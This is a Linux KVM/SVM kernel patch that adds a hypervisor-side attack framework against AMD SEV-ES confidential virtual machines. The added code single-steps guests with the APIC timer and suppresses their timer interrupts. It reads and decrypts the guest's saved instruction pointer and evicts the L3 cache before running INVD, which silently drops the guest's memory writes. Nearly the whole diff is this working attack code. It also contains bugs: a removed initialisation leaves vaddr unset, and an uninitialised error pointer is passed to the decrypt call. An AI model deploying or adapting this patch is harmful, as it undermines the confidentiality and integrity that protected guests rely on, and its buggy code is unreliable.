diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c
index efaaef2b7ae1..2af73fafe5bf 100644
--- a/arch/x86/kvm/svm/sev.c
+++ b/arch/x86/kvm/svm/sev.c
@@ -784,7 +784,7 @@ static int __sev_issue_dbg_cmd(struct kvm *kvm, unsigned long src,
 			     &data, error);
 }
 
-static int __sev_dbg_decrypt(struct kvm *kvm, unsigned long src_paddr,
+int __sev_dbg_decrypt(struct kvm *kvm, unsigned long src_paddr,
 			     unsigned long dst_paddr, int sz, int *err)
 {
 	int offset;
@@ -933,7 +933,6 @@ static int sev_dbg_crypt(struct kvm *kvm, struct kvm_sev_cmd *argp, bool dec)
 	if (!debug.dst_uaddr)
 		return -EINVAL;
 
-	vaddr = debug.src_uaddr;
 	size = debug.len;
 	vaddr_end = vaddr + size;
 	dst_vaddr = debug.dst_uaddr;
diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
index ce362e88a567..f34c83f97ce8 100644
--- a/arch/x86/kvm/svm/svm.c
+++ b/arch/x86/kvm/svm/svm.c
@@ -9,6 +9,7 @@
 #include "cpuid.h"
 #include "pmu.h"
 
+#include <linux/mm.h>
 #include <linux/module.h>
 #include <linux/mod_devicetable.h>
 #include <linux/kernel.h>
@@ -16,6 +17,7 @@
 #include <linux/highmem.h>
 #include <linux/amd-iommu.h>
 #include <linux/sched.h>
+#include <linux/io.h>
 #include <linux/trace_events.h>
 #include <linux/slab.h>
 #include <linux/hashtable.h>
@@ -258,6 +260,25 @@ static int tsc_aux_uret_slot __read_mostly = -1;
 
 static const u32 msrpm_ranges[] = {0, 0xc0000000, 0xc0010000};
 
+/* Interrupt Framework */
+#define SEV_STEP_FLAG_BASE_PFN 0x1FEE01
+
+static void* vmsa_vaddr;
+static void* sev_step_page_va;
+
+static u16 zero_stepping_time = 0;
+static u32 non_zero_stepping_time = 0;
+static u32 apic_interval = 0;
+static u64 last_vmsa_rip = 0;
+
+struct page *tpage = NULL;
+static void *dst_vaddr;
+static u64 dst_paddr = 0;
+static u64 vmsa_paddr = 0;
+// static u64 hsave;
+
+static void *evict_buffer[20];
+
 #define NUM_MSR_MAPS ARRAY_SIZE(msrpm_ranges)
 #define MSRS_RANGE_SIZE 2048
 #define MSRS_IN_RANGE (MSRS_RANGE_SIZE * 8 / 2)
@@ -1355,6 +1376,19 @@ static int svm_vcpu_create(struct kvm_vcpu *vcpu)
 	struct page *vmsa_page = NULL;
 	int err;
 
+	tpage = (void *)alloc_page(GFP_KERNEL | __GFP_ZERO);
+	if (!tpage)
+		return -ENOMEM;
+	for (int i = 0; i < 20; i++) {
+		evict_buffer[i] = (void *)__get_free_pages(GFP_KERNEL | __GFP_ZERO | __GFP_COMP, 9);
+		if (!evict_buffer[i])
+			return -ENOMEM;
+		printk("evict_buffer_%d: %lx\n", i, __pa(evict_buffer[i]));
+	}
+	dst_vaddr = vmap(&tpage, 1, 0, PAGE_KERNEL);
+	dst_paddr = __sme_page_pa(tpage);
+	sev_step_page_va = kmap_local_pfn(SEV_STEP_FLAG_BASE_PFN);
+
 	BUILD_BUG_ON(offsetof(struct vcpu_svm, vcpu) != 0);
 	svm = to_svm(vcpu);
 
@@ -1397,8 +1431,10 @@ static int svm_vcpu_create(struct kvm_vcpu *vcpu)
 	svm->vmcb01.pa = __sme_set(page_to_pfn(vmcb01_page) << PAGE_SHIFT);
 	svm_switch_vmcb(svm, &svm->vmcb01);
 
-	if (vmsa_page)
+	if (vmsa_page) {
 		svm->sev_es.vmsa = page_address(vmsa_page);
+		vmsa_paddr = svm->vmcb->control.vmsa_pa;
+	}
 
 	svm->guest_state_loaded = false;
 
@@ -1437,6 +1473,18 @@ static void svm_vcpu_free(struct kvm_vcpu *vcpu)
 
 	sev_free_vcpu(vcpu);
 
+	if (tpage) {
+		vunmap(dst_vaddr);
+		__free_page(tpage);
+	}
+	for (int i = 0; i < 20; i++)
+	{
+		if (evict_buffer[i]) {
+			free_pages((unsigned long)evict_buffer[i], 9);
+		}
+	}
+	kunmap_local(sev_step_page_va);
+
 	__free_page(pfn_to_page(__sme_clr(svm->vmcb01.pa) >> PAGE_SHIFT));
 	__free_pages(virt_to_page(svm->msrpm), get_order(MSRPM_SIZE));
 }
@@ -2152,12 +2200,163 @@ static int nmi_interception(struct kvm_vcpu *vcpu)
 }
 
 static int smi_interception(struct kvm_vcpu *vcpu)
-{
+{	
 	return 1;
 }
 
+// ---------------------------------------------------------------------------
+void flush(void *p) { asm volatile("clflush 0(%0)\n" : : "c"(p) : "rax"); }
+
+// ---------------------------------------------------------------------------
+void maccess(void *p) { asm volatile("movq (%0), %%rax\n" : : "c"(p) : "rax"); }
+
+u64 rdpru_m(void) {
+    u64 a, d;
+    asm volatile("mfence");
+    asm volatile(".byte 0x0f,0x01,0xfd" : "=a"(a), "=d"(d) : "c"(0) : );
+    a = (d << 32) | a;
+    asm volatile("mfence");
+    return a;
+}
+
+u64 rdpru_a(void) {
+    u64 a, d;
+    asm volatile("mfence");
+    asm volatile(".byte 0x0f,0x01,0xfd" : "=a"(a), "=d"(d) : "c"(1) : );
+    a = (d << 32) | a;
+    asm volatile("mfence");
+    return a;
+}
+
+u64 my_read_msr(u64 msr) {
+  u64 low = 0, high = 0;
+  asm volatile("rdmsr" : "=a"(low), "=d"(high) : "c"(msr));
+  return low | (high << 32);
+}
+
 static int intr_interception(struct kvm_vcpu *vcpu)
 {
+	u64 flag = *((volatile u64 *)(sev_step_page_va));
+	u8 sw = flag & 0xff; // Magic value
+
+	struct vcpu_svm *svm = to_svm(vcpu);
+	
+	/*
+	 *  Interrupt Hook
+	 */
+	if (sw == 0x77) {
+		u64 rip;
+		u8 dec 		= (flag >> 8)  & 0x1;
+		u8 invd 	= (flag >> 10) & 0x1;
+		u8 no_step 	= (flag >> 11) & 0x1;
+		u64 vmsa_paddr = svm->vmcb->control.vmsa_pa;
+		
+		/* Beginning */
+		if (zero_stepping_time == 0 && non_zero_stepping_time == 0) {
+			/* Mark VMSA into UC will make `VMRUN` updates all vmsa state in cache */
+			
+			/* Avoid to drop smth dirty data and freeze the system
+			 * wbnoinvd is enough to make it reliable
+			 * wbinvd also works, but it takes longer time
+			 */
+			if (invd) {
+				asm volatile ("wbnoinvd\n\t");
+			}
+		}
+
+		/* If we don't care the interrupt leads to zero or single/multi steppings */
+		if (no_step) {
+			if (!vmsa_vaddr)
+				vmsa_vaddr = phys_to_virt(vmsa_paddr);
+			non_zero_stepping_time++;
+		}
+		else {
+			/* Just read the ciphertext */
+			if (!dec) {
+				if (!vmsa_vaddr)
+					vmsa_vaddr = phys_to_virt(vmsa_paddr);
+				/* rIP offset is 0x178 in VMSA */
+				rip = *(volatile u64 *)(vmsa_vaddr+0x178);
+			}
+			else {
+				int *err;
+				/* The minimal block size is 16 */
+				__sev_dbg_decrypt(vcpu->kvm, __sme_set(vmsa_paddr+0x170), __sme_set(dst_paddr+0x170), 16, err);
+				rip = *((volatile u64 *)((u64)dst_vaddr+0x178));
+			}
+
+			/* Zero-stepping */
+			if (last_vmsa_rip == rip) {
+				zero_stepping_time++;
+			}
+			else {
+				/* Single/Multi-stepping*/
+				if (dec) {
+					printk("rIP: 0x%llx\t last rIP: 0x%llx\n", rip, last_vmsa_rip);
+				}
+				last_vmsa_rip = rip;
+				non_zero_stepping_time++;
+			}
+
+		}
+
+		/* non_zero_stepping_time */
+		if (non_zero_stepping_time == (flag >> 32)) {
+			zero_stepping_time = 0;
+			non_zero_stepping_time = 0;
+
+			/* Stop the hook */
+			*((volatile u64 *)(sev_step_page_va)) = 0;
+			/* Do not overwirte the APIC Timer next time */
+			apic_interval = 0;
+			if (vmsa_vaddr) {
+				vmsa_vaddr = NULL;
+			}
+		}
+
+		/* Will set the timer before `VMRUN` */
+		apic_interval = (flag >> 16) & 0xffff;
+
+		return 1;
+	}
+	else {
+		zero_stepping_time = 0;
+		non_zero_stepping_time = 0;
+	}
+
 	++vcpu->stat.irq_exits;
 	return 1;
 }
@@ -3404,7 +3603,7 @@ static int svm_handle_exit(struct kvm_vcpu *vcpu, fastpath_t exit_fastpath)
 
 		vmexit = nested_svm_exit_special(svm);
 
-		if (vmexit == NESTED_EXIT_CONTINUE)
+		if (vmexit == NESTED_EXIT_CONTINUE) 
 			vmexit = nested_svm_exit_handled(svm);
 
 		if (vmexit == NESTED_EXIT_DONE)
@@ -3532,17 +3731,26 @@ void svm_complete_interrupt_delivery(struct kvm_vcpu *vcpu, int delivery_mode,
 static void svm_deliver_interrupt(struct kvm_lapic *apic,  int delivery_mode,
 				  int trig_mode, int vector)
 {
-	kvm_lapic_set_irr(vector, apic);
-
-	/*
-	 * Pairs with the smp_mb_*() after setting vcpu->guest_mode in
-	 * vcpu_enter_guest() to ensure the write to the vIRR is ordered before
-	 * the read of guest_mode.  This guarantees that either VMRUN will see
-	 * and process the new vIRR entry, or that svm_complete_interrupt_delivery
-	 * will signal the doorbell if the CPU has already entered the guest.
+	/* SEV_STEP  
+	 *
+	 * Filter the APIC Timer interrupt sent to the Guest
 	 */
-	smp_mb__after_atomic();
-	svm_complete_interrupt_delivery(apic->vcpu, delivery_mode, trig_mode, vector);
+	u8 flag = *((volatile u8 *)(sev_step_page_va));
+	if (flag != 0x77 || vector != 0xec) {
+
+		kvm_lapic_set_irr(vector, apic);
+
+		/*
+		* Pairs with the smp_mb_*() after setting vcpu->guest_mode in
+		* vcpu_enter_guest() to ensure the write to the vIRR is ordered before
+		* the read of guest_mode.  This guarantees that either VMRUN will see
+		* and process the new vIRR entry, or that svm_complete_interrupt_delivery
+		* will signal the doorbell if the CPU has already entered the guest.
+		*/
+		
+		smp_mb__after_atomic();
+		svm_complete_interrupt_delivery(apic->vcpu, delivery_mode, trig_mode, vector);
+	}
 }
 
 static void svm_update_cr8_intercept(struct kvm_vcpu *vcpu, int tpr, int irr)
@@ -3896,18 +4104,64 @@ static fastpath_t svm_exit_handlers_fastpath(struct kvm_vcpu *vcpu)
 	return EXIT_FASTPATH_NONE;
 }
 
+#define C 1
+#define D 1
+#define L 1
+#define S 32 / 16
+
+// L3 16384 sets
+void __attribute__((aligned(0x1000))) prime_l3_set(void* addr){
+  for (int s = 0; s < S-D ; s+=L ){
+    for(int c = 0; c < C; c++) {
+      for(int d = 0; d < D; d++) {
+	      maccess(addr+((s+d) << 20));
+      }
+    }
+  }
+}
+
 static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu, bool spec_ctrl_intercepted)
 {
 	struct vcpu_svm *svm = to_svm(vcpu);
+	u32 flag 	= *((volatile u32 *)(sev_step_page_va));
+	u8 invd 	= (flag >> 10) & 0x1;
+
+	/* The L2 index we want to drop */
+	u64 filter_set_idx = *((volatile u64 *)(sev_step_page_va+8));
 
 	guest_state_enter_irqoff();
 
+	if ((flag & 0xff) != 0x77)
+		apic_interval = 0;
+
 	if (sev_es_guest(vcpu->kvm))
-		__svm_sev_es_vcpu_run(svm, spec_ctrl_intercepted);
+		// __svm_sev_es_vcpu_run(svm, spec_ctrl_intercepted);
+		__svm_sev_es_vcpu_run(svm, spec_ctrl_intercepted, (u32*)(APIC_BASE + APIC_TMICT), apic_interval);
 	else
 		__svm_vcpu_run(svm, spec_ctrl_intercepted);
+	
+	/* After the context switch */
+	if (invd && vmsa_vaddr) {
+		asm volatile ("cli\n");
+
+		/* Touch the VMSA page once so that its data get written back to memory (idk why) */
+		*(volatile u64 *)(vmsa_vaddr);
+		
+		// Full L3-eviction except for 16 sets that have same L2 index with the target
+		for (int i = 0; i < 16384; i++) {
+			if ( (i&0x3ff) != filter_set_idx) {
+				for (int j = 0; j < 20; j++)
+					prime_l3_set(evict_buffer[j]+(i<<6));
+			}
+		}
+
+		asm volatile ("mfence\n");
+		asm volatile ("invd\n");
+		asm volatile ("sti\n");
+	}
 
 	guest_state_exit_irqoff();
+
 }
 
 static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
@@ -3957,11 +4211,11 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
 		svm_set_dr6(svm, vcpu->arch.dr6);
 	else
 		svm_set_dr6(svm, DR6_ACTIVE_LOW);
-
+		
 	clgi();
 	kvm_load_guest_xsave_state(vcpu);
 
-	kvm_wait_lapic_expire(vcpu);
+	kvm_wait_lapic_expire(vcpu); 
 
 	/*
 	 * If this vCPU has touched SPEC_CTRL, restore the guest's value if
@@ -3993,7 +4247,7 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
 
 	kvm_load_host_xsave_state(vcpu);
 	stgi();
-
+		
 	/* Any pending NMI will happen here */
 
 	if (unlikely(svm->vmcb->control.exit_code == SVM_EXIT_NMI))
@@ -4035,7 +4289,7 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
 
 	if (is_guest_mode(vcpu))
 		return EXIT_FASTPATH_NONE;
-
+	
 	return svm_exit_handlers_fastpath(vcpu);
 }
 
diff --git a/arch/x86/kvm/svm/svm.h b/arch/x86/kvm/svm/svm.h
index 199a2ecef1ce..e571a044def3 100644
--- a/arch/x86/kvm/svm/svm.h
+++ b/arch/x86/kvm/svm/svm.h
@@ -538,6 +538,15 @@ static inline bool is_x2apic_msrpm_offset(u32 offset)
 
 extern bool dump_invalid_vmcb;
 
+void flush(void *p);
+void maccess(void *p);
+// void prime_l2_set(void* addr);
+u64 rdpru_m(void);
+u64 rdpru_a(void);
+u64 my_read_msr(u64 msr);
+
 u32 svm_msrpm_offset(u32 msr);
 u32 *svm_vcpu_alloc_msrpm(void);
 void svm_vcpu_init_msrpm(struct kvm_vcpu *vcpu, u32 *msrpm);
@@ -673,6 +682,7 @@ void sev_hardware_unsetup(void);
 int sev_cpu_init(struct svm_cpu_data *sd);
 void sev_init_vmcb(struct vcpu_svm *svm);
 void sev_free_vcpu(struct kvm_vcpu *vcpu);
+int __sev_dbg_decrypt(struct kvm *kvm, unsigned long src_paddr, unsigned long dst_paddr, int sz, int *err);
 int sev_handle_vmgexit(struct kvm_vcpu *vcpu);
 int sev_es_string_io(struct vcpu_svm *svm, int size, unsigned int port, int in);
 void sev_es_vcpu_reset(struct vcpu_svm *svm);
@@ -682,7 +692,8 @@ void sev_es_unmap_ghcb(struct vcpu_svm *svm);
 
 /* vmenter.S */
 
-void __svm_sev_es_vcpu_run(struct vcpu_svm *svm, bool spec_ctrl_intercepted);
+void __svm_sev_es_vcpu_run(struct vcpu_svm *svm, bool spec_ctrl_intercepted, u32 *apic_reg_addr, u32 apic_interval);
+// void __svm_sev_es_vcpu_run(struct vcpu_svm *svm, bool spec_ctrl_intercepted);
 void __svm_vcpu_run(struct vcpu_svm *svm, bool spec_ctrl_intercepted);
 
 #endif
diff --git a/arch/x86/kvm/svm/vmenter.S b/arch/x86/kvm/svm/vmenter.S
index 34367dc203f2..19789b95db51 100644
--- a/arch/x86/kvm/svm/vmenter.S
+++ b/arch/x86/kvm/svm/vmenter.S
@@ -336,6 +336,15 @@ SYM_FUNC_START(__svm_sev_es_vcpu_run)
 	/* Enter guest mode */
 	sti
 
+	cmp $0, %_ASM_ARG4L
+	je 1f
+	
+	/* Clean the cache state (avoid crash) */
+	wbnoinvd
+
+	/* APIC Interval */
+	movl %_ASM_ARG4L, (%_ASM_ARG3)
+
 1:	vmrun %_ASM_AX
 
 2:	cli
